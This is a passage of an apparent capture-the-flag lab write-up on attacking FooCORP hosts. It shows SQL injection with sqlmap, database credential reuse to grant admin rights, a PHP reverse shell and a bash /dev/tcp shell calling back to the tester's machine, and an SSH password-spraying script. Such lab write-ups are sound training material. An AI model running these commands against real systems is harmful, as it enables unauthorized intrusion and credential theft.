<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div></center>
<hr /><br />
<center>© FooCORP 2021</center>
<body></html>
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
sed -i 's/127.0.0.1/172.16.64.10/' php-payload.php
Simply open:
http://75ajvxi36vchsv584es1.foocorp.io/app/upload/php-reverse-shell.php
Flag encountered through PHP reverse shell
$ cat flag.txt
Congratulations, you got this!
$ pwd
/var/www/html
✔️172.16.64.92 (Linux 3.12 - 95%)
22/tcp
open
ssh
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
53/tcp
open
domain
dnsmasq 2.75
80/tcp
open
http
Apache httpd 2.4.18
63306/tcp
open
mysql
MySQL 5.7.25-0ubuntu0.16.04.2
Target URL: http://172.16.64.92
File Extension: *
File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Jul 22 17:24:49 EDT 2021
--------------------------------
http://172.16.64.92:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/images/
/assets/
/assets/js/
/assets/css/
/assets/fonts/
/assets/sass/
/assets/css/images/
/assets/sass/libs/
Dirs found with a 403 response:
/icons/
/icons/small/
/server-status/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/assets/js/jquery.scrolly.min.js
/assets/js/browser.min.js
/assets/js/breakpoints.min.js
/assets/js/jquery.min.js
/assets/js/util.js
/assets/js/main.js
/assets/js/footracking.js
/assets/css/font-awesome.min.css
/assets/sass/main.scss
/assets/sass/noscript.scss
/assets/fonts/FontAwesome.otf
/assets/css/main.css
/assets/css/images/overlay3.svg
/assets/css/noscript.css
/assets/fonts/fontawesome-webfont.eot
/assets/css/images/overlay4.svg
/assets/sass/libs/_breakpoints.scss
/assets/sass/libs/_functions.scss
/assets/sass/libs/_html-grid.scss
/assets/fonts/fontawesome-webfont.ttf
/assets/fonts/fontawesome-webfont.svg
/assets/sass/libs/_mixins.scss
/assets/sass/libs/_vars.scss
/assets/fonts/fontawesome-webfont.woff2
/assets/fonts/fontawesome-webfont.woff
/assets/sass/libs/_vendor.scss
--------------------------------
Found secret url while inspecting footracking.js
view-source:http://172.16.64.92/assets/js/footracking.js
alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log("OK");
} else {
console.log("Error!");
}
xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}
Having found 72ab311dcbfaa40ca0739f5daf505494/tracking2.php URL leads to think there's another hidden tracking.php (without '2'), where an id
url parameter can be passed:
Actions:
Try sqlmap
Scan new found directory with Gobuster/Dirbuster
sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' --dbs
[06:13:35] [INFO] fetching database names
available databases [2]:
[*] footracking
[*] information_schema
sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' -D footracking --tables
Database: footracking
[2 tables]
+----------------+
| telemetry_test |
| users |
+----------------+
sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' -D footracking -T users --dump
Database: footracking
Table: users
[4 entries]
+----+-----+-------------------------------------------+-----------+
| id | adm | password | username |
+----+-----+-------------------------------------------+-----------+
| 1 | yes | c5d71f305bb017a66c5fa7fd66535b84 | fcadmin1 |
| 2 | yes | 14d69ee186f8d9bbeddd4da31559ce0f | fcadmin2 |
| 3 | no | 827ccb0eea8a706c4c34a16891f84e7b (12345) | tracking1 |
| 4 | no | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+
Found Credentials on MySQL database via sqlmap
| id | adm | password | username |
+----+-----+-------------------------------------------+-----------+
| 1 | yes | c5d71f305bb017a66c5fa7fd66535b84 | fcadmin1 |
| 2 | yes | 14d69ee186f8d9bbeddd4da31559ce0f | fcadmin2 |
| 3 | no | 827ccb0eea8a706c4c34a16891f84e7b (12345) | tracking1 |
| 4 | no | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+
Output should be:
Discovered login route!
Not enough privileges when login into 72ab311dcbfaa40ca0739f5daf50549/login.php with tracking1/12345
Found credentials in webpage's source code
view-source:http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php
<!-- = '127.0.0.1'; = 'dbuser'; = 'xXxyYyzZz789789)))'; = 'footracking'; = mysqli_connect(, , , );--><br />
dbuser
xXxyYyzZz789789)))
footracking
Actions:
Connect to new mysql database
Elevate privileges for
tracking1
user
mysql --host=172.16.64.92 --user=dbuser --password='xXxyYyzZz789789)))' --port=63306
> use footracking
> update users set adm='yes' where id=3;
> select * from users;
+----+-----------+----------------------------------+-----+
| id | username | password | adm |
+----+-----------+----------------------------------+-----+
| 1 | fcadmin1 | c5d71f305bb017a66c5fa7fd66535b84 | yes |
| 2 | fcadmin2 | 14d69ee186f8d9bbeddd4da31559ce0f | yes |
| 3 | tracking1 | 827ccb0eea8a706c4c34a16891f84e7b | yes |
| 4 | tracking2 | e10adc3949ba59abbe56e057f20f883e | no |
+----+-----------+----------------------------------+-----+
4 rows in set (0.142 sec)
We now get into a Admin Console panel where we can inject PHP sentences
We initiate
nc -lvpn 1234
locallyWe open a reverse shell against our machine while we listen locally on port 1234
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.16.64.10/1234 0>&1'");
We find a long DNS name on /etc/hosts
while inspecting through our reverse shell
This is the last machine's IP to pwn.
www-data@dns: $ cat /etc/hosts
...
127.0.0.1 0pm6duqbu2o8ajzkjeai.foocorp.io
127.0.0.1 ttpxbpp88fgt9r3292ag.foocorp.io
172.16.64.91 75ajvxi36vchsv584es1.foocorp.io
127.0.0.1 9fys6zpn5k03zt299wyj.foocorp.io
127.0.0.1 uvq8daoyiuq75znffwvy.foocorp.io
127.0.0.1 qv0jwarev2y4lq69xy9w.foocorp.io
127.0.0.1 h1z07t1pujg9ti677md0.foocorp.io
...
Flag encountered
We find the flag while inspecting the remote filesystem through our reverse shell:
www-data@dns:/var/www$ cat flag.txt
cat flag.txt
Congratulations! You got it.
✔️172.16.64.166 (Linux 3.12 - 95%)
2222/tcp
open
ssh
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
8080/tcp
open
http
Apache httpd 2.4.18
[SSH] Warning about password policy
Employees are requested to change their default CHANGEME
password.
ssh admin@172.16.64.166 -p 2222 130 ⨯
#################################################################
# WARNING! This system is for authorized users only. #
# You activity is being actively monitored. #
# Any suspicious behavior will be resported. #
#################################################################
~~~~ WORK IN PROGRESS ~~~~
Dear employee! Remember to change the default CHANGEME password ASAP.
admin@172.16.64.166's password:
Target URL: http://172.16.64.166:8080
File Extension: *
File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Jul 22 17:25:53 EDT 2021
--------------------------------
http://172.16.64.166:8080
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/img/
/img/blog/
/img/gallery/
/css/
/js/
/img/stream/
/img/slider/
Dirs found with a 403 response:
/icons/
/icons/small/
/server-status/
--------------------------------
--------------------------------
[Web] Found commented info for logged in users on the website's markup!
wget http://172.16.64.166:8080/about-us.htm
xmllint --html about-us.htm --xpath '//comment()'
about-us.htm:47: HTML parser error : Tag header invalid
<header id="header">
^
about-us.htm:60: HTML parser error : Tag nav invalid
<nav id="nav" role="navigation">
^
about-us.htm:86: HTML parser error : Tag section invalid
<section id="titlebar">
^
about-us.htm:95: HTML parser error : Tag nav invalid
<nav id="breadcrumbs">
^
about-us.htm:304: HTML parser error : Tag footer invalid
<footer id="footer">
^
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<!--<![endif]-->
<!--
ucorpora by freshdesignweb.com
Twitter: https://twitter.com/freshdesignweb
https://www.freshdesignweb.com/ucorpora/
-->
<!-- Basic Meta Tags -->
<!--[if (gte IE 9)|!(IE)]>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<![endif]-->
<!-- Favicon -->
<!-- Styles -->
<!-- Font Avesome Styles -->
<!--[if IE 7]>
<link href="css/font-awesome/font-awesome-ie7.min.css" rel="stylesheet">
<![endif]-->
<!-- FlexSlider Style -->
<!-- Internet Explorer condition - HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<!-- Header -->
<!-- Logo -->
<!-- Submenu -->
<!-- End Submenu -->
<!-- Header End -->
<!-- Titlebar
================================================== -->
<!-- Container -->
<!-- Container / End -->
<!-- Content -->
<!-- Our Team -->
<!-- For logged in only
<div class="slider2 team flexslider">
<ul class="slides">
<li>
<div class="row">
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/1.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Elizabeth Lopez</h4>
managing director
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/2.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Tara Baker</h4>
designer
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/3.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Becky Casey</h4>
project manager
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/4.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Randy Carlson</h4>
developer
</div>
</a>
</div>
</li>
<li>
<div class="row">
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/3.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Pablo Roberts</h4>
founder
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/4.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Bessie Hammond</h4>
programmer
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/1.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Gerardo Malone</h4>
junior designer
</div>
</a>
<a href="#">
<div class="span3 square-1">
<div class="img-container">
<img src="img/our-team/2.jpg" alt="">
<div class="img-bg-icon"></div>
</div>
<h4>Sabrina Summers</h4>
analyst
</div>
</a>
</div>
</li>
</ul>
</div>
//Our Team End -->
<!-- Typography Row -->
<!-- Line -->
<!-- Button -->
<!-- Title -->
<!-- Line -->
<!-- Typography Row End-->
<!-- List -->
<!-- List End -->
<!-- Progress Bar -->
<!-- Progress Bar End -->
<!-- Client Says -->
<!-- Client Says End -->
<!-- Content End -->
<!-- Footer -->
<!-- Footer End -->
<!-- JavaScripts -->
# We generate this dictionary from the names found in the commented markup
elizabeth
Lopez
elizabethlopez
elopez
managingdirector
director
manager
tara
baker
tarabaker
tbaker
designer
beckycasey
becky
casey
bcasey
project
manager
projectmanager
randy
carlson
randycarlson
rcarlson
developer
pabloroberts
pablo
roberts
proberts
founder
bessiehammond
bessie
hammond
bhammond
programmer
gerardomalone
gerardo
malone
gmalone
juniordesigner
junior
designer
sabrina
#!/bin/sh
# Bruteforce known users against SSH with password CHANGEME
for user in $(cat users.txt);
do
echo "Trying '$user'..."
sshpass -p CHANGEME ssh -p 2222 $user@172.16.64.166 2>/dev/null
if [ $? -eq 0 ]; then
exit
fi
done;
$ sh script.sh
Trying 'elizabeth'...
Trying 'Lopez'...
Trying 'elizabethlopez'...
Trying 'elopez'...
Trying 'managingdirector'...
Trying 'director'...
Trying 'manager'...
Trying 'tara'...
Trying 'baker'...
Trying 'tarabaker'...
Trying 'tbaker'...
Trying 'designer'...
Trying 'beckycasey'...
Trying 'becky'...
Trying 'casey'...
Trying 'bcasey'...
Trying 'project'...
Trying 'manager'...
Trying 'projectmanager'...
Trying 'randy'...
Trying 'carlson'...
Trying 'randycarlson'...
Trying 'rcarlson'...
Trying 'developer'...
Trying 'pabloroberts'...
Trying 'pablo'...
Trying 'roberts'...
Trying 'proberts'...
Trying 'founder'...
Trying 'bessiehammond'...
Trying 'bessie'...
Trying 'hammond'...
Trying 'bhammond'...
Trying 'programmer'...
Trying 'gerardomalone'...
Trying 'gerardo'...
Trying 'malone'...
Trying 'gmalone'...
Trying 'juniordesigner'...
Trying 'junior'...
Trying 'designer'...
Trying 'sabrina'...
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
195 packages can be updated.
10 updates are security updates.
Last login: Thu Jul 22 22:17:15 2021 from 172.16.64.10
sabrina@xubuntu:~$
[SSH] We are able to login with sabrina:CHANGEME
Trying 'sabrina'...
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
195 packages can be updated.
10 updates are security updates.
Last login: Thu Jul 22 22:17:15 2021 from 172.16.64.10
sabrina@xubuntu:~$
Found hosts.bak in sabrina's account via ssh:
sabrina@xubuntu:~$ cat ~/hosts.bak
127.0.0.1 localhost
172.16.64.81 cms.foocorp.io
172.16.64.81 static.foocorp.io
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Flag encountered! 😁
sabrina@xubuntu:~$ cat ~/flag.txt
Congratulations! You have successfully exploited this machine.
Go for the others now.
Last updated